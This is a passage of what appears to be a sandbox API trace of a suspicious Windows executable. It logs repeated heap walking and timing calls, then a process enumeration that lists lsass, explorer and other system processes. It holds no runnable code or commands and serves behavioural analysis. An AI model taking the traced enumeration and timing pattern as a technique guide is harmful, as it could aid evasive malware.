(in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.479] Heap32Next (lphe=0x391efc0) returned 1 [0147.494] GetTickCount () returned 0x1134ce9 [0147.495] GetCurrentThreadId () returned 0x35c [0147.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.495] Heap32Next (lphe=0x391efc0) returned 1 [0147.509] GetTickCount () returned 0x1134cf8 [0147.509] GetCurrentThreadId () returned 0x35c [0147.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.509] Heap32Next (lphe=0x391efc0) returned 1 [0147.524] GetTickCount () returned 0x1134cf8 [0147.524] GetCurrentThreadId () returned 0x35c [0147.524] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.524] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.524] Heap32Next (lphe=0x391efc0) returned 1 [0147.539] GetTickCount () returned 0x1134d08 [0147.539] GetCurrentThreadId () returned 0x35c [0147.539] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.539] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.539] Heap32Next (lphe=0x391efc0) returned 1 [0147.554] GetTickCount () returned 0x1134d17 [0147.554] GetCurrentThreadId () returned 0x35c [0147.554] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.554] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.554] Heap32Next (lphe=0x391efc0) returned 1 [0147.569] GetTickCount () returned 0x1134d27 [0147.569] GetCurrentThreadId () returned 0x35c [0147.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.569] Heap32Next (lphe=0x391efc0) returned 1 [0147.584] GetTickCount () returned 0x1134d37 [0147.584] GetCurrentThreadId () returned 0x35c [0147.584] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.584] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.584] Heap32Next (lphe=0x391efc0) returned 1 [0147.605] GetTickCount () returned 0x1134d56 [0147.605] GetCurrentThreadId () returned 0x35c [0147.605] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.605] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.605] Heap32Next (lphe=0x391efc0) returned 1 [0147.624] GetTickCount () returned 0x1134d65 [0147.624] GetCurrentThreadId () returned 0x35c [0147.624] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.624] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.624] Heap32Next (lphe=0x391efc0) returned 1 [0147.640] GetTickCount () returned 0x1134d75 [0147.640] GetCurrentThreadId () returned 0x35c [0147.640] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.640] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.640] Heap32Next (lphe=0x391efc0) returned 1 [0147.655] GetTickCount () returned 0x1134d85 [0147.655] GetCurrentThreadId () returned 0x35c [0147.655] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.655] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.655] Heap32Next (lphe=0x391efc0) returned 1 [0147.671] GetTickCount () returned 0x1134d94 [0147.671] GetCurrentThreadId () returned 0x35c [0147.671] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.672] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.672] Heap32Next (lphe=0x391efc0) returned 1 [0147.687] GetTickCount () returned 0x1134da4 [0147.687] GetCurrentThreadId () returned 0x35c [0147.687] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.687] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.687] Heap32Next (lphe=0x391efc0) returned 1 [0147.702] GetTickCount () returned 0x1134db3 [0147.702] GetCurrentThreadId () returned 0x35c [0147.702] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.702] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.702] Heap32Next (lphe=0x391efc0) returned 1 [0147.716] GetTickCount () returned 0x1134dc3 [0147.716] GetCurrentThreadId () returned 0x35c [0147.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.716] Heap32Next (lphe=0x391efc0) returned 1 [0147.732] GetTickCount () returned 0x1134dd3 [0147.732] GetCurrentThreadId () returned 0x35c [0147.732] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.732] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.732] Heap32Next (lphe=0x391efc0) returned 1 [0147.747] GetTickCount () returned 0x1134de2 [0147.747] GetCurrentThreadId () returned 0x35c [0147.747] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.747] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.747] Heap32Next (lphe=0x391efc0) returned 1 [0147.761] GetTickCount () returned 0x1134df2 [0147.761] GetCurrentThreadId () returned 0x35c [0147.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.762] Heap32Next (lphe=0x391efc0) returned 1 [0147.777] GetTickCount () returned 0x1134e01 [0147.777] GetCurrentThreadId () returned 0x35c [0147.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.777] Heap32Next (lphe=0x391efc0) returned 1 [0147.792] GetTickCount () returned 0x1134e11 [0147.792] GetCurrentThreadId () returned 0x35c [0147.792] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.792] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.792] Heap32Next (lphe=0x391efc0) returned 1 [0147.807] GetTickCount () returned 0x1134e21 [0147.807] GetCurrentThreadId () returned 0x35c [0147.807] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.807] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.807] Heap32Next (lphe=0x391efc0) returned 1 [0147.822] GetTickCount () returned 0x1134e30 [0147.822] GetCurrentThreadId () returned 0x35c [0147.822] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.822] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.822] Heap32Next (lphe=0x391efc0) returned 1 [0147.837] GetTickCount () returned 0x1134e30 [0147.837] GetCurrentThreadId () returned 0x35c [0147.837] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.837] Heap32Next (lphe=0x391efc0) returned 1 [0147.851] GetTickCount () returned 0x1134e40 [0147.851] GetCurrentThreadId () returned 0x35c [0147.851] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.852] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.852] Heap32Next (lphe=0x391efc0) returned 1 [0147.868] GetTickCount () returned 0x1134e4f [0147.868] GetCurrentThreadId () returned 0x35c [0147.868] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.868] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.868] Heap32Next (lphe=0x391efc0) returned 1 [0147.883] GetTickCount () returned 0x1134e5f [0147.883] GetCurrentThreadId () returned 0x35c [0147.883] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.883] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.883] Heap32Next (lphe=0x391efc0) returned 1 [0147.898] GetTickCount () returned 0x1134e6f [0147.898] GetCurrentThreadId () returned 0x35c [0147.898] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.898] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.898] Heap32Next (lphe=0x391efc0) returned 1 [0147.913] GetTickCount () returned 0x1134e7e [0147.913] GetCurrentThreadId () returned 0x35c [0147.913] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.913] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.913] Heap32Next (lphe=0x391efc0) returned 1 [0147.929] GetTickCount () returned 0x1134e8e [0147.929] GetCurrentThreadId () returned 0x35c [0147.929] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.929] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.929] Heap32Next (lphe=0x391efc0) returned 1 [0147.944] GetTickCount () returned 0x1134e9d [0147.944] GetCurrentThreadId () returned 0x35c [0147.944] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.944] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.944] Heap32Next (lphe=0x391efc0) returned 1 [0147.959] GetTickCount () returned 0x1134ead [0147.959] Heap32ListNext (hSnapshot=0x630, lphl=0x391f454) returned 1 [0147.959] GetTickCount () returned 0x1134ead [0147.959] GetTickCount () returned 0x1134ead [0147.959] Process32First (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.960] GetCurrentThreadId () returned 0x35c [0147.960] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.960] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.960] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.961] GetTickCount () returned 0x1134ead [0147.961] GetCurrentThreadId () returned 0x35c [0147.961] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.961] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.961] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.963] GetTickCount () returned 0x1134ebd [0147.963] GetCurrentThreadId () returned 0x35c [0147.963] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.963] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.963] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.963] GetTickCount () returned 0x1134ebd [0147.964] GetCurrentThreadId () returned 0x35c [0147.964] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.964] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.964] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.964] GetTickCount () returned 0x1134ebd [0147.964] GetCurrentThreadId () returned 0x35c [0147.964] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.964] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.965] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.965] GetTickCount () returned 0x1134ebd [0147.965] GetCurrentThreadId () returned 0x35c [0147.965] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.965] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.965] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.966] GetTickCount () returned 0x1134ebd [0147.966] GetCurrentThreadId () returned 0x35c [0147.966] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.966] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.966] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.967] GetTickCount () returned 0x1134ebd [0147.967] GetCurrentThreadId () returned 0x35c [0147.967] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.967] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.967] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.968] GetTickCount () returned 0x1134ebd [0147.968] GetCurrentThreadId () returned 0x35c [0147.968] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.968] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.968] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.969] GetTickCount () returned 0x1134ebd [0147.969] GetCurrentThreadId () returned 0x35c [0147.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.969] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.969] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.970] GetTickCount () returned 0x1134ebd [0147.970] GetCurrentThreadId () returned 0x35c [0147.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.970] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.970] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.970] GetTickCount () returned 0x1134ebd [0147.970] GetCurrentThreadId () returned 0x35c [0147.971] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.971] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.971] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.971] GetTickCount () returned 0x1134ebd [0147.971] GetCurrentThreadId () returned 0x35c [0147.971] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.971] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.971] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.972] GetTickCount () returned 0x1134ebd [0147.972] GetCurrentThreadId () returned 0x35c [0147.972] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.972] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.972] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.973] GetTickCount () returned 0x1134ebd [0147.973] GetCurrentThreadId () returned 0x35c [0147.973] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.973] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.973] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.974] GetTickCount () returned 0x1134ebd [0147.974] GetCurrentThreadId () returned 0x35c [0147.974] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.974] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.974] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.975] GetTickCount () returned 0x1134ebd [0147.975] GetCurrentThreadId () returned 0x35c [0147.975] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.975] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.975] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0147.975] GetTickCount () returned 0x1134ebd [0147.975] GetCurrentThreadId () returned 0x35c [0147.976] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.976] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.976] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.976] GetTickCount () returned 0x1134ebd [0147.976] GetCurrentThreadId () returned 0x35c [0147.976] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.976] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.976] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.977] GetTickCount () returned 0x1134ebd [0147.977] GetCurrentThreadId () returned 0x35c [0147.977] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.977] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.977] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.978] GetTickCount () returned 0x1134ecc [0147.978] GetCurrentThreadId () returned 0x35c [0147.978] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.978] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.978] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x378, pcPriClassBase=13, dwFlags=0x0, szExeFile="penelop0611_2019-11-06_10-30.exe_.exe")) returned 1 [0147.979] GetTickCount () returned 0x1134ecc [0147.979] GetCurrentThreadId () returned 0x35c [0147.979] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.979] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.979] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.980] GetTickCount () returned 0x1134ecc [0147.980] GetCurrentThreadId () returned 0x35c [0147.980] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.980] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.980] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.980] GetTickCount () returned 0x1134ecc [0147.980] GetCurrentThreadId () returned 0x35c [0147.980] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.980] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.980] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.981] GetTickCount () returned 0x1134ecc [0147.981] GetCurrentThreadId () returned 0x35c [0147.981] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.981] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.981] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0147.982] GetTickCount () returned 0x1134ecc [0147.982] GetCurrentThreadId () returned 